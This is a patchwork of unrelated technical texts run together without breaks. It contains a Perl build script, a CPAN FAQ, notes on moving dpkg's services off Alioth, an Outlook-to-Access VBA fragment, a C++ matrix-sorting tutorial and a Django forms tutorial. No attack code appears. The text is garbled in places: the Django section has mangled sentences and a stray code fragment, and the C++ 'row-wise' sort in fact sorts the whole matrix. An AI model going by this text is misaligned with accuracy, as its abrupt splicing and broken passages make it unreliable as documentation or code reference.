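build_perl() {
  src_dir="$1"
  cd "$src_dir" || return 1
  sh Configure -des &&   # -d: use defaults, -e: proceed, -s: be quiet
  make &&
  make test &&
  make install
}

# Example invocation (hypothetical directory name):
# build_perl perl-5.005_03
```

If you need non-default answers (installation prefix, compiler flags), run Configure without `-des` and answer its questions interactively.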
Where can I find Perl modules?

The central repository is CPAN itself: browse or search the modules directory on any CPAN mirror, or use one of the search interfaces listed elsewhere in this FAQ.

Where can I find the most recently uploaded Perl modules?
-
-
-
- - an RSS format of /recent
Any of these should be good for your daily feed of new modules.
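A related question from the contents above is how to find out what modules are already installed on your system. A minimal shell helper, assuming perl (with the standard ExtUtils::Installed module) is on your PATH:

```shell
# Sketch: list the Perl modules installed on this machine.
# ExtUtils::Installed ships with standard Perl distributions.
list_installed_modules() {
  command -v perl >/dev/null 2>&1 || {
    echo "perl not found on PATH" >&2
    return 1
  }
  perl -MExtUtils::Installed \
       -e 'print "$_\n" for ExtUtils::Installed->new->modules'
}
```

The output includes one entry per installed distribution, which you can compare against the recent-uploads lists above before downloading.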
Where can I find Perl modules for Windows? has a FAQ for their Package Manager or which has a nice listing of Win32 resources including modules.
Where can I find Perl binaries/packages or Perl module binaries?

Pre-compiled Perl distributions for many platforms are collected in the ports area of CPAN; check your nearest CPAN mirror.
How are Perl and the CPAN modules licensed?

Perl itself (Copyright 1989-1999, Larry Wall) is distributed under a dual license: you may redistribute it under either the Artistic License or the GNU General Public License. Modules on CPAN are licensed individually by their authors; many use the same terms as Perl itself, but check each module's documentation to be sure.
Does the Perl source include any modules?
Yes, Perl comes with a number of useful modules and are listed in the perlmodlib pod:
-
- perldoc perlmodlib
What modules are platform dependent?
Several implementations of Perl on specific platforms come bundled with a collection of platform specific modules. Additional information is available for:
IBM OS/2
The following modules come with standard Perl.
- OS2::DLL
- Access to DLLs with REXX calling convention and REXX runtime.
- OS2::ExtAttr
- Access to extended attributes.
- OS2::PrfDB
- Access to the OS/2 setting database.
- OS2::Process
- Constants for \tool{system}(2) call on OS/2.
- OS2::REXX
- Access to DLLs with REXX calling convention and REXX runtime.
DEC (Open)VMS
The following modules come with standard Perl.
- VMS::DCLsym
- Perl extension to manipulate DCL symbols.
- VMS::Filespec
- Converts between VMS and Unix file specification syntax.
- VMS::Stdio
- Standard I/O functions via VMS extensions.
- VMS::XSSymSet
- Keeps sets of symbol names palatable to the VMS linker.
Microsoft Windows (32 bit)
The following modules come with ActiveState Perl.
- Win32::ChangeNotify
- Monitors events related to files and directories.
- Win32::Console
- Uses Win32 Console and Character Mode Functions.
- Win32::Event
- Uses Win32 event objects.
- Win32::EventLog
- Processes Win32 Event Logs.
- Win32::File
- Manages file attributes.
- Win32::FileSecurity
- Manages FileSecurity Discretionary Access Control Lists.
- Win32::IPC
- Loads base class for Win32 synchronization objects.
- Win32::Internet
- Accesses WININET.DLL functions.
- Win32::Mutex
- Uses Win32 mutex objects.
- Win32::NetAdmin
- Manages network groups and users.
- Win32::NetResource
- Manages network resources.
- Win32::ODBC
- Uses ODBC Extension for Win32.
- Win32::OLE
- Uses OLE Automation extensions.
- Win32::OLE::Const
- Extracts constant definitions from TypeLib.
- Win32::OLE::Enum
- Uses OLE Automation Collection Objects.
- Win32::OLE::NLS
- Uses OLE National Language Support.
- Win32::OLE::Variant
- Creates and modifies OLE VARIANT variables.
- Win32::PerfLib
- Accesses the Windows NT Performance Counter.
- Win32::Process
- Creates and manipulates processes.
- Win32::Semaphore
- Uses Win32 semaphore objects.
- Win32::Service
- Manages system services.
- Win32::Sound
- Plays with Windows sounds.
- Win32::TieRegistry
- Mungs the registry.
- Win32API::File
- Accesses low-level Win32 system API calls for files and directories.
- Win32API::Net
- Manages Windows NT LanManager accounts.
- Win32API::Registry
- Accesses low-level Win32 system API calls from WINREG.H.
Where can I find Perl scripts?
-
-
-
- and many, many other places on the net have Perl programs....
Where can I find the Perl FAQs?
The Perl FAQ is included with the Perl source code distribution.
- perldoc perlfaq
-
Where can I find Perl documentation?
-
-
- perldoc perldoc to use the documentation included with your Perl distribution.
- for those who have read all of the free documentation and want something they can read in the loo by candlelight.
Where can I find Perl module documentation?
-,
-
- perldoc Foo::Bar if the module is installed locally.
Where do I find Perl DBI/DBD/database documentation?
- - Alligator Descartes Definitive DBI page.
- - A mySQL Perl DBI/DBD Manual.
- - The DBI man page.
- perldoc DBI
Where can I find Perl mailing lists?
There are quite a few mailing lists with a broad range of topics.
-
-,
-
- - browseable web archives of many of the Perl lists.
Many of the lists are open for general subscription. If you don't see a list that interests you and would like to start your own you may ask lists@perl.org to set one up for you if you cannot host it yourself.
Where can I find Perl journals/magazines?
- The journal in print for Perl.
- A terrific on-line only journal.
- Randal Schwartz's Web Techniques columns.
- ;login:, the publication of USENIX.
- System Admin Magazine, which has occasional Perl articles.
Where can I find Perl courses/training/on-line tutorials?
Training
Where can I find CPAN on a CD-ROM?
CPAN (cpan.org) does not produce CD-ROMs, sorry. Besides, these days one would need a DVD.
How do I find/join/organise a Perl User Group?
The Perl User Groups are known as "Perl Mongers" and have active groups all over the world. You can find an established group, or start a new one if none is near you, via the Perl Mongers website.
Where can I find a history of Perl releases or a general history of the Perl community?
A history of Perl releases can be found in your Perl distribution via perldoc perlhist.
A more general history of the Perl community, CPAST, is also available on the web.
I got an error downloading a module, what should I do?
- What program were you using to download?
A Web browser?
An FTP client?
- Which server were you using?
Note that many Perl software servers redirect your WWW requests to a site (hopefully) nearer to you. For example, the perl.com multiplexer does that, so you often aren't downloading from perl.com itself. If you are using a web browser, take a close look at the URL/Location. Also note that we cannot debug your network connectivity, and if you have problems connecting to anywhere other than the CPAN master site, we probably cannot be of service.
- What was the exact error message?
We are not clairvoyant so please include the exact error message, cut and paste if you must.
- Did you retry later?
The server might be temporarily busy or be offline and refuse connections for a while. Retry later or try another server.
I downloaded a module/script/file but it was corrupt, what should I do?
How do I use module Foo::Bar, can you help? (a.k.a. Are you a helpdesk?)
When downloading a module a strange VRML viewer started up and I got an error, what should I do? On Windows:
- Open "My Computer" or Windows NT Explorer.
- Select the "View" menu.
- Select "Options".
- Click the "File Types" tab.
- Scroll through the "Registered file types" until you reach "WorldView VRMLViewer Object" and select it.
- Click "Remove".
- Answer "Yes". (I've never seen these VRML files WorldView claims to be caring about: if you have and you do care, please tell me how to make WorldView stop caring about the .gz and application/x-gzip)
- Quit and restart your browser for the change to take effect.
- The next time you try to open a file ending in .gz, Windows will ask you which application to use to open that file. Scroll down to WinZip (winzip32), and remember to check the box asking whether to always use this application to open this type of file, unless, of course, you plan on regularly using the VRML viewer.
Where can I find the GDBM_File/DB_File module?
I'm having trouble with search.cpan.org, whom do I need to contact?
If you are experiencing difficulty using search.cpan.org due to network or server errors, you need to contact webmaster@search.cpan.org.
How do I search for anything on CPAN?
By using a CPAN search engine.
- Graham Barr's search engine, which can search for modules, distributions or authors in all of CPAN.
- Randy Kobes' search engine, which can also search all of CPAN for modules, documentation, etc.
- Full text search of pods on PAUSE.
How do I search for ANYTHING, really?
- Any general web search engine (too many to list).
How do I find Ralph Nader? (a.k.a. We're C-P-A-N not C-S-P-A-N!)
You dialed the wrong number. The place you are looking for is the C-SPAN website.
How do I contribute modules to CPAN?
Does CPAN allow contributions of shareware or code that requests a fee of any kind?
How do I contribute scripts to CPAN?
CPAN has a scripts repository to which standalone scripts can be contributed.
How do I report/fix a bug in a module/script?
First analyze the problem (to the extent you can) and report your discoveries. Can you fix the bug yourself? If not, please contact the author of the module/script; the documentation of the module/script should tell you how.
How do I go about maintaining a module when the author is unresponsive?
Sometimes a module goes unmaintained for a while due to the author pursuing other interests, being busy, etc., and another person needs changes applied to that module and may become frustrated when their email goes unanswered. If you find yourself in this position:
- Be courteous.
- Be considerate.
- Make an earnest attempt to contact the author.
- Give it time. If you need changes made immediately, consider applying your patches to the current module, changing the version and requiring that version for your application. Eventually the author will turn up and apply your patches, or offer you maintenance of the module; if the author doesn't respond in a year, you may be granted maintenance after demonstrating sustained interest.
- If you need changes in order for another module or application to work, consider making the needed changes and bundling the new version with your own distribution and noting the change well in the documentation. Do not upload the new version under the same namespace to CPAN until the matter has been resolved with the author or CPAN.
Simply keep in mind that you are dealing with a person who invested time and care into something. A little respect and courtesy go a long way.
How do I adopt or take over a module already on CPAN?
- Try to contact the current maintainer. If there is no response, make a public post on a highly trafficked site announcing your intention to take over the module, for example on appropriate mailing lists or web forums.
- Wait a bit. The PAUSE admins don't want to act too quickly in case the current maintainer is on holiday. If there's no response to private communication or the public post, a PAUSE admin can transfer it to you.
Is there a site for module bug reports/tests?
Does CPAN provide download statistics for authors?
No, we don't.
How do I mirror CPAN?
Either an FTP or rsync client will do. Scantily clad virgins and pale moonlight are optional and are not included in the sales price.
What do I need to mirror CPAN?
- "Good" Internet connectivity, e.g. better than a 14.4 modem but not so much as an OC3.
- Around 1 GB of storage space (the CPAN website reports its current size).
- An FTP or rsync client.
- For FTP there is a Perl script named mirror (which assumes a command line FTP client):
The FTP address for the CPAN master site is:
- and for rsync:
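As a concrete illustration of the rsync approach, a daily mirror job could look like the sketch below. The hostname and destination path are placeholders, not real addresses; substitute a CPAN rsync mirror near you.

```shell
# Sketch of a daily CPAN mirror job. The hostname and destination
# path below are placeholders, not real addresses.
SRC="rsync://cpan-mirror.example.org/CPAN/"
DST="/srv/mirrors/CPAN/"
# -a preserves permissions/times, -v is verbose, --delete removes
# local files that disappeared upstream so the mirror stays exact.
CMD="rsync -av --delete $SRC $DST"
echo "$CMD"
```

Run from cron once a day; rsync's --bwlimit option can be added if the upstream mirror asks you to be gentle with bandwidth.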
I have Windows Vista/XP/2000/NT/98/95, how can I mirror CPAN?
Which CPAN site should I mirror?
- For your mirror site to be useful to your users you should mirror daily.
- You can also provide a HTTP interface in addition to an FTP interface to CPAN if you wish to do so.
- Consider also giving rsync access to your mirror. Many people like rsync because it's very bandwidth-friendly.
- Remember to tell cpan@perl.org about all the access methods you provide to your mirror: ftp, http, or rsync (or any other methods).
How do I register my mirror to make it a public resource?
Alioth is shutting down. Several of the services that dpkg uses need to be migrated elsewhere. This page covers what those are and the alternatives, with possible pros and cons.
Services used from Alioth
- git repos: anonscm.debian.org
- hook: debbugs tagpending
- git.dpkg.org: git-tag-pending hook.
- salsa.d.o: webhook available.
- hook: commit email notifications
- git.dpkg.org: git-multimail hook.
salsa.d.o: support email notifications but it sends all commits in a single mail, and this is apparently not going to be fixed in salsa. Upstream bug.
- hook: IRC notifications
- git.dpkg.org: kgb-client hook.
salsa.d.o: support for KGB (but it uses URL shorteners, see Debian bug #900706) or irker instances.
- hook: CI trigger
- git.dpkg.org: grml-jenkins trigger hook.
- salsa.d.o: runners now available.
- salsa.d.o: there are a couple of plugins for jenkins and gitlab.
- group commit rights (although we might want to consider setting up the repos in a different way to avoid push+release clashes)
- git.dpkg.org: a couple of push only SSH accounts can be easily created.
- salsa.d.o: supported by default.
- static website: → dpkg.alioth.debian.org
- git stats
- git.dpkg.org: gitstats trigger hook.
- salsa.d.o: can be replaced with the built-in support.
- historic VCS and release tarballs
- git.dpkg.org: easy hosting of the few files, TLS support.
- salsa.d.o: pages support, not sure whether it's a good fit for biggish content. Does not look likely.
- libdpkg doxygen generated docs
- git.dpkg.org: trigger hook.
- salsa.d.o: pages support, could be generated manually (like now) or could be triggered as part of some CI/CD setup.
- code coverage reports
- git.dpkg.org: trigger hook.
- salsa.d.o: pages support, could be generated manually (like now) or could be triggered as part of some CI/CD setup.
Alternatives
salsa.debian.org
This is the natural successor. Although it currently poses some problems, many are probably fixable, others are minor paper-cuts.
Cons:
- URL-change-fatigue and service-tied URL. Ideally the URL should be service neutral, like the previous anonscm.d.o.
- there's now a redirector in place, but it specifies the redirection as permanent, which makes git emit warnings, and it states it should be immediately reverted once the repos have been migrated.
- some of the webhooks are currently suboptimal or plain broken.
- single notification mail for all commits.
- KGB uses shortened URLs.
- gitlab seems to have a somewhat broken web notification system (paper-cut).
- the current setup makes everyone a member of the collective debian group, which means each and every project there is your own, and there's no obvious way to pin specific repos.
- namespacing is already a mess.
Pros:
- "obvious" migration path, supported by Debian.
- out-of-the-box groups/users/maintenance.
- provides very interesting features: merge requests, built-in CI, etc.
- pages support.
(git|www).dpkg.org
Cons:
- self-hosted (DSA do not seem happy to host any of this themselves).
- possibly annoying or no user-management, but it should really require just a couple of accounts in any case.
Pros:
- way more stable URLs, and can host redirectors in "perpetuity".
- can automatically push to the various hosting instances easily with access tokens or similar (salsa, github, etc).
- can easily host the web site.
- can easily trigger CI/CD on the same system.
- can use whatever hooks we want (including non-limited KGB or broken email notifications).
dpkg.debian.net
Similar Cons and Pros to using dpkg.org. And in addition:
Cons:
- way, way worse URLs, and no distinction between www and git URLs.
Pros:
- does not require approval from anyone.
- even if we get better URLs later on, they can be cheaply redirected in "perpetuity".
Is there a way that I can import information from my Outlook calendar into an Access table?
To import your data, you'll first need to build a table to hold the information. Table 7-2 lists the fields associated with Outlook's calendar appointments that you'll need to include in your table.
Table 7-2. Fields in the Outlook calendar table
Next, you'll need to add a reference to the Outlook Object Library (see Figure 7-20). To display the References dialog, choose Tools → References from the Visual Basic Editor's main menu.
Figure 7-20. Adding the Outlook Object Library to your application
Finally, here is a routine that will do the work. It begins by declaring a bunch of variables needed to access Outlook's data, plus an ADO
Recordset object that will be used to save the information into Access:
Sub Example7_15()
    Dim Outlook As Outlook.Application
    Dim namespace As Outlook.namespace
    Dim root As Outlook.MAPIFolder
    Dim cal As Outlook.MAPIFolder
    Dim item As Object
    Dim appt As Outlook.AppointmentItem
    Dim rs As ADODB.Recordset

    Set Outlook = New Outlook.Application
    ...
Program for Row wise sorting of Matrix
In this tutorial, we will learn about the Program for Row wise sorting of Matrix in C++. Firstly we will learn about matrix and its insertion. Then sort the matrix row-wise.
Introduction
A matrix is a rectangular array of numbers arranged in rows and columns. The total number of elements in a matrix is the product of the number of rows and the number of columns. To sort the matrix we copy all of its elements into a one-dimensional array, sort that array, and write the sorted values back row by row.
Before sorting we have to read the matrix from input. To do this we use two nested loops: an outer loop over rows and an inner loop over columns.
Demonstration:
#include <iostream>
using namespace std;

int main() {
    int matrix[10][10];
    cout << "Enter the data : " << endl;
    for (int i = 0; i < 2; i++) {
        for (int j = 0; j < 2; j++) {
            cin >> matrix[i][j];
        }
    }
    cout << endl;
    for (int i = 0; i < 2; i++) {
        for (int j = 0; j < 2; j++) {
            cout << matrix[i][j] << " ";
        }
        cout << endl;
    }
    return 0;
}
In the above code we use two loops: the outer one moves across rows and the inner one across columns.
Program for row-wise sorting of matrix in C++
Code:
#include <bits/stdc++.h>
using namespace std;
#define SIZE 10

void sort(int mat[SIZE][SIZE], int n) {
    int temp[n * n];
    int k = 0;
    for (int i = 0; i < n; i++)
        for (int j = 0; j < n; j++)
            temp[k++] = mat[i][j];

    sort(temp, temp + k);

    k = 0;
    for (int i = 0; i < n; i++)
        for (int j = 0; j < n; j++)
            mat[i][j] = temp[k++];
}

void print(int mat[SIZE][SIZE], int n) {
    for (int i = 0; i < n; i++) {
        for (int j = 0; j < n; j++)
            cout << mat[i][j] << " ";
        cout << endl;
    }
}

int main() {
    int mat[SIZE][SIZE];
    int n;
    cout << "Enter the dimension of matrix : ";
    cin >> n;
    for (int i = 0; i < n; i++)
        for (int j = 0; j < n; j++)
            cin >> mat[i][j];

    cout << "Original Matrix:\n";
    print(mat, n);
    sort(mat, n);
    cout << "\nMatrix After Sorting:\n";
    print(mat, n);
    return 0;
}
Input and Output:
Enter the dimension of matrix : 2 2 3 6 1 Original Matrix: 2 3 6 1 Matrix After Sorting: 1 2 3 6
Explanation:
First we read the matrix from input.
Then we call the sort function, which takes the matrix and its dimension as arguments. A temporary array the size of the matrix is created and filled with the matrix's elements, sorted like an ordinary one-dimensional array, and the sorted values are then copied back into the matrix row by row.
Therefore the matrix is sorted.
Conclusion
This was the program for row-wise sorting of the matrix. We can also use the same method for the sorting of one-dimensional array.
In this tutorial we'll show you how to work with HTML Forms in Django. As part of this demonstration we'll extend the LocalLibrary website so that librarians can renew books, and create, update and delete authors using our own forms (rather than using the admin application).
Overview
An HTML Form is a group of one or more fields/widgets on a web page, which can be used to collect information from users for submission to a server. Forms are a flexible mechanism for collecting user input because there are suitable widgets for entering many different types of data, including text boxes, checkboxes, radio buttons, date pickers, etc. Forms are also a relatively secure way of sharing data with the server, as they allow us to send data in POST requests with cross-site request forgery protection.
While we haven't created any forms in this tutorial so far, we've already encountered them in the Django Admin site — for example the screenshot below shows a form for editing one of our Book models, comprised of a number of selection lists and text editors.
Working with forms can be complicated! Developers need to write HTML for the form, validate and properly sanitise entered data on the server (and possibly also in the browser), repost the form with error messages to inform users of any invalid fields, handle the data when it has successfully been submitted, and finally respond to the user in some way to indicate success. Django Forms take a lot of the work out of all these steps, by providing a framework that lets you define forms and their fields programmatically, and then use these objects to both generate the form HTML code and handle much of the validation and user interaction.
In this tutorial we're going to show you a few of the ways you can create and work with forms, and in particular, how the generic editing form views can significantly reduce the amount of work you need to do to create forms to manipulate your models. Along the way we'll extend our LocalLibrary application by adding a form to allow librarians to renew library books, and we'll create pages to create, edit and delete books and authors (reproducing a basic version of the form shown above for editing books).
HTML Forms
First, a brief overview of HTML Forms. Consider a simple HTML form with a single text field for entering the name of some "team", and its associated label. In HTML, the form is defined as a collection of elements inside <form>...</form> tags, containing at least one input element of type="submit". While here we just have one text field for entering the team name, a form may have any number of other input elements and associated labels. The submit input is displayed (by default) as a button that can be pressed by the user to upload the data in all the other input elements in the form.
The role of the server is first to render the initial form state — either containing blank fields, or pre-populated with initial values. After the user presses the submit button the server will receive the form data with values from the web browser, and must validate the information. If the form contains invalid data the server should display the form again, this time with user-entered data in "valid" fields, and messages to describe the problem for the invalid fields. Once the server gets a request with all valid form data it can perform an appropriate action (e.g. saving the data, returning the result of a search, uploading a file etc.) and then notify the user.
As you can imagine, creating the HTML, validating the returned data, re-displaying the entered data with error reports if needed, and performing the desired operation on valid data can all take quite a lot of effort to "get right". Django makes this a lot easier, by taking away some of the heavy lifting and repetitive code!
Django form handling data to be displayed). What makes things more complicated is that the server also needs to be able to process data provided by the user, and redisplay the page if there are any errors.
A process flowchart of how Django handles form requests is shown below, starting with a request for a page containing a form (shown in green).
Based on the diagram above, the main things that Django's form handling does are:
- Display the default form the first time it is requested by the user. The form may contain blank fields, or be pre-populated with initial values.
- The form is referred to as unbound at this point, because it isn't associated with any user-entered data (though it may have initial values).
- Receive data from a submit request and bind it to the form.
- Binding data to the form means that the user-entered data and any errors are available when we need to redisplay the form.
- Clean and validate the data.
- Cleaning the data performs sanitisation of the input (e.g. removing invalid characters that might potentially used to send malicious content to the server) and converts them into consistent Python types.
- Validation checks that the values are appropriate for the field (e.g. are in the right date range, aren't too short or too long, etc.)
- If any data is invalid, re-display the form, this time with any user populated values and error messages for the problem fields.
- If all data is valid, perform required actions (e.g. save the data, send and email, return the result of a search, upload a file etc.)
- Once all actions are complete, redirect the user to another page.
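The cycle above (display an unbound form, bind submitted data, validate, then either use the cleaned data or redisplay with errors) can be sketched in plain Python. The class below is a toy model for illustration only, not Django's actual API:

```python
import datetime

class ToyRenewForm:
    """Toy model of the bind -> validate -> use cycle (not Django's API)."""

    def __init__(self, data=None, initial=None):
        self.data = data              # None means the form is "unbound"
        self.initial = initial or {}
        self.cleaned_data = {}
        self.errors = {}

    def is_valid(self):
        if self.data is None:         # unbound forms are never valid
            return False
        raw = self.data.get('renewal_date', '')
        try:
            # "Clean" the raw string into a proper Python date.
            value = datetime.date.fromisoformat(raw)
        except ValueError:
            self.errors['renewal_date'] = 'Enter a valid date.'
            return False
        self.cleaned_data['renewal_date'] = value
        return True

form = ToyRenewForm(data={'renewal_date': '2016-11-27'})
print(form.is_valid())                    # True
print(form.cleaned_data['renewal_date'])  # 2016-11-27
```

Django's real Form class follows the same shape: binding happens in the constructor, validation in is_valid(), and validated values land in cleaned_data.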
Django provides a number of tools and approaches to help you with the tasks detailed above. The most fundamental is the
Form class, which simplifies both generation of form HTML and data cleaning/validation. In the next section we describe how forms work using the practical example of a page to allow librarians to renew books.
Note: Understanding how
Form is used will help you when we discuss Django's more "high level" form framework classes.
Renew-book form using a Form and function view
Next we're going to add a page to allow librarians to renew borrowed books. To do this we'll create a form that allows users to enter a date value. We'll seed the field with an initial value 3 weeks from the current date (the normal borrowing period), and add some validation to ensure that the librarian can't enter a date in the past or a date too far in the future. When a valid date has been entered, we'll write it to the current record's
BookInstance.due_back field.
The example will use a function-based view and a
Form class. The following sections explain how forms work, and the changes you need to make to our ongoing LocalLibrary project.
Form
The
Form class is the heart of Django's form handling system. It specifies the fields in the form, their layout, display widgets, labels, initial values, valid values, and (once validated) the error messages associated with invalid fields. The class also provides methods for rendering itself in templates using predefined formats (tables, lists, etc.) or for getting the value of any element (enabling fine-grained manual rendering).
Declaring a Form
The declaration syntax for a
Form is very similar to that for declaring a
Model, and shares the same field types (and some similar parameters). This makes sense because in both cases we need to ensure that each field handles the right types of data, is constrained to valid data, and has a description for display/documentation.
To create a
Form we import the
forms library, derive from the
Form class, and declare the form's fields. A very basic form class for our library book renewal form is shown below:
from django import forms

class RenewBookForm(forms.Form):
    renewal_date = forms.DateField(help_text="Enter a date between now and 4 weeks (default 3).")
Form fields
In this case we have a single
DateField for entering the renewal date that will render in HTML with a blank value, the default label "Renewal date:", and some helpful usage text: "Enter a date between now and 4 weeks (default 3 weeks)." As none of the other optional arguments are specified the field will accept dates using the input_formats: YYYY-MM-DD (2016-11-06), MM/DD/YYYY (02/26/2016), MM/DD/YY (10/25/16), and will be rendered using the default widget: DateInput.
There are many other types of form fields, which you will largely recognise from their similarity to the equivalent model field classes:
BooleanField, CharField, ChoiceField, TypedChoiceField, DateField, DateTimeField, DecimalField, DurationField, FileField, FilePathField, FloatField, ImageField, IntegerField, GenericIPAddressField, MultipleChoiceField, TypedMultipleChoiceField, NullBooleanField, RegexField, SlugField, TimeField, URLField, UUIDField, ComboField, MultiValueField, SplitDateTimeField, ModelMultipleChoiceField, and ModelChoiceField.
The arguments that are common to most fields are listed below (these have sensible default values):
- required: If True, the field may not be left blank or given a None value. Fields are required by default, so you would set required=False to allow blank values in the form.
- label: The label to use when rendering the field in HTML. If a label is not specified then Django will create one from the field name by capitalising the first letter and replacing underscores with spaces (e.g. Renewal date).
- label_suffix: By default a colon is displayed after the label (e.g. Renewal date:). This argument allows you to specify a different suffix containing other character(s).
- initial: The initial value for the field when the form is displayed.
- widget: The display widget to use.
- help_text (as seen in the example above): Additional text that can be displayed in forms to explain how to use the field.
- error_messages: A list of error messages for the field. You can override these with your own messages if needed.
- validators: A list of functions that will be called on the field when it is validated.
- localize: Enables the localisation of form data input (see link for more information).
- disabled: The field is displayed but its value cannot be edited if this is True. The default is False.
Validation
Django provides numerous places where you can validate your data. The easiest way to validate a single field is to override the method
clean_<fieldname>() for the field you want to check. So for example, we can validate that entered
renewal_date values are between now and 4 weeks by implementing
clean_renewal_date() as shown below.
from django import forms from django.core.exceptions import ValidationError from django.utils.translation import ugettext_lazy as _ import datetime #for checking renewal date range. class RenewBookForm(forms.Form): renewal_date = forms.DateField(help_text="Enter a date between now and 4 weeks (default 3).") def clean_renewal_date(self): data = self.cleaned_data['renewal_date']
There are two important things to note. The first is that we get our data using
self.cleaned_data['renewal_date'] and that we return this data whether or not we change it at the end of the function. This step gets us the data "cleaned" and sanitised of potentially unsafe input using the default validators, and converted into the correct standard type for the data (in this case a Python
datetime.datetime object).
The second point is that if a value falls outside our range we raise a
ValidationError, specifying the error text that we want to display in the form if an invalid value is entered. The example above also wraps this text in one of Django's translation functions
ugettext_lazy() (imported as
_()), which is good practice if you want to translate your site later.
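Stripped of the Django machinery, the range check performed by clean_renewal_date() is plain datetime arithmetic. The helper below is a standalone sketch (validate_renewal is our name, not part of Django), raising ValueError where the form would raise ValidationError:

```python
import datetime

def validate_renewal(renewal_date, today=None, max_weeks=4):
    """Return renewal_date if it lies between today and max_weeks ahead."""
    today = today or datetime.date.today()
    if renewal_date < today:
        raise ValueError('Invalid date - renewal in past')
    if renewal_date > today + datetime.timedelta(weeks=max_weeks):
        raise ValueError('Invalid date - renewal more than 4 weeks ahead')
    return renewal_date

today = datetime.date(2016, 11, 6)
print(validate_renewal(today + datetime.timedelta(weeks=3), today=today))  # 2016-11-27
```

Keeping validation logic this self-contained also makes it easy to unit test independently of any form or view.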
Note: There are numerious other methods and examples for validating forms in Form and field validation (Django docs). For example, in cases where you have multiple fields that depend on each other, you can override the Form.clean() function and again raise a
ValidationError.
That's all we need for the form in this example!
Copy the Form
Create and open the file locallibrary/catalog/forms.py and copy the entire code listing from the previous block into it.
URL Configuration
Before we create our view, let's add a URL configuration for the renew-books page. Copy the following configuration to the bottom of locallibrary/catalog/urls.py.
urlpatterns += [ url(r'^book/(?P<pk>[-\w]+)/renew/$', views.renew_book_librarian, name='renew-book-librarian'), ]
The URL configuration will redirect URLs with the format /catalog/book/<bookinstance id>/renew/ to the function named
renew_book_librarian() in views.py, and send the
BookInstance id as the parameter named
pk.
Note: We can name our captured URL data "pk" anything we like, because we have complete control over the view function (we're not using a generic detail view class that expects parameters with a certain name). However
pk, short for "primary key", is a reasonable convention to use!
View
As discussed in the Django form handling process above, the view has to render the default form when it is first called and then either re-render it with error messages if the data is invalid, or process the data and redirect to a new page if the data is valid. In order to perform these different actions, the view has to be able to know whether it is being called for the first time to render the default form, or a subsequent time to validate data.
For forms that use a
POST request to submit information to the server, the most common pattern is for the view to test against the
POST request type (
if request.method == 'POST':) to identify form validation requests and
GET (using an
else condition) to identify the initial form creation request. If you want to submit your data using a
GET request then a typical approach for identifying whether this is the first or subsequent view invocation is to read the form data (e.g. to read a hidden value in the form).
The book renewal process will be writing to our database, so by convention we use the
POST request approach. The code fragment below shows the (very standard) pattern for this sort of function view.
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
import datetime

from .forms import RenewBookForm

def renew_book_librarian(request, pk):
    book_inst = get_object_or_404(BookInstance, pk=pk)

    # If this is a POST request then process the Form data
    if request.method == 'POST':

        # Create a form instance and populate it with data from the request (binding):
        form = RenewBookForm(request.POST)

        # Check if the form is valid:
        if form.is_valid():
            # process the data in form.cleaned_data as required (here we just write it to the model due_back field)
            book_inst.due_back = form.cleaned_data['renewal_date']
            book_inst.save()

            # redirect to a new URL:
            return HttpResponseRedirect(reverse('all-borrowed'))

    # If this is a GET (or any other method) create the default form.
    else:
        proposed_renewal_date = datetime.date.today() + datetime.timedelta(weeks=3)
        form = RenewBookForm(initial={'renewal_date': proposed_renewal_date,})

    return render(request, 'catalog/book_renew_librarian.html', {'form': form, 'bookinst': book_inst})
First we import our form (
RenewBookForm) and a number of other useful objects/methods used in the body of the view function:
get_object_or_404(): Returns a specified object from a model based on its primary key value, and raises an
Http404 exception (not found) if the record does not exist.
HttpResponseRedirect: This creates a redirect to a specified URL (HTTP status code 302).
reverse(): This generates a URL from a URL configuration name and a set of arguments. It is the Python equivalent of the
url tag that we've been using in our templates.
datetime: A Python library for manipulating dates and times.
In the view we first use the
pk argument in
get_object_or_404() to get the current
BookInstance (if this does not exist, the view will immediately exit and the page will display a "not found" error). If this is not a
POST request (handled by the
else clause) then we create the default form passing in an
initial value for the
renewal_date field (as shown in bold below, this is 3 weeks from the current date).
book_inst = get_object_or_404(BookInstance, pk=pk)

# If this is a GET (or any other method) create the default form.
else:
    proposed_renewal_date = datetime.date.today() + datetime.timedelta(weeks=3)
    form = RenewBookForm(initial={'renewal_date': proposed_renewal_date,})

return render(request, 'catalog/book_renew_librarian.html', {'form': form, 'bookinst': book_inst})
After creating the form, we call
render() to create the HTML page, specifying the template and a context that contains our form. In this case the context also contains our
BookInstance, which we'll use in the template to provide information about the book we're renewing.
If however this is a
POST request, then we create our
form object and populate it with data from the request. This process is called "binding" and allows us to validate the form. We then check if the form is valid, which runs all the validation code on all of the fields — including both the generic code to check that our date field is actually a valid date and our specific form's
clean_renewal_date() function to check the date is in the right range.') ) return render(request, 'catalog/book_renew_librarian.html', {'form': form, 'bookinst':book_inst})
If the form is not valid we call
render() again, but this time the form value passed in the context will include error messages.
If the form is valid, then we can start to use the data, accessing it through the
form.cleaned_data attribute (e.g.
data = form.cleaned_data['renewal_date']). Here we just save the data into the
due_back value of the associated
BookInstance object.
Important: While you can also access the form data directly through the request (for example request.POST['renewal_date'], or request.GET['renewal_date'] if using a GET request), this is NOT recommended. The cleaned data is sanitised, validated, and converted into Python-friendly types. The final step in the form-handling part of the view is to redirect to another page; here we use reverse() to construct the redirect URL from its configuration name, though you could also hard-code a URL such as '/'.
That's everything needed for the form handling itself, but we still need to restrict access to the view to librarians. We should probably create a new permission in
BookInstance ("
can_renew"), but to keep things simple here we just use the
@permission_required function decorator with our existing
can_mark_returned permission.
The final view is therefore as shown below. Please copy this into the bottom of locallibrary/catalog/views.py.
from django.contrib.auth.decorators import permission_required
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
import datetime

from .forms import RenewBookForm

@permission_required('catalog.can_mark_returned')
def renew_book_librarian(request, pk):
    """
    View function for renewing a specific BookInstance by librarian
    """
    book_inst = get_object_or_404(BookInstance, pk=pk)

    # If this is a POST request then process the Form data
    if request.method == 'POST':

        # Create a form instance and populate it with data from the request (binding):
        form = RenewBookForm(request.POST)

        # Check if the form is valid:
        if form.is_valid():
            # process the data in form.cleaned_data as required (here we just write it to the model due_back field)
            book_inst.due_back = form.cleaned_data['renewal_date']
            book_inst.save()

            # redirect to a new URL:
            return HttpResponseRedirect(reverse('all-borrowed'))

    # If this is a GET (or any other method) create the default form
    else:
        proposed_renewal_date = datetime.date.today() + datetime.timedelta(weeks=3)
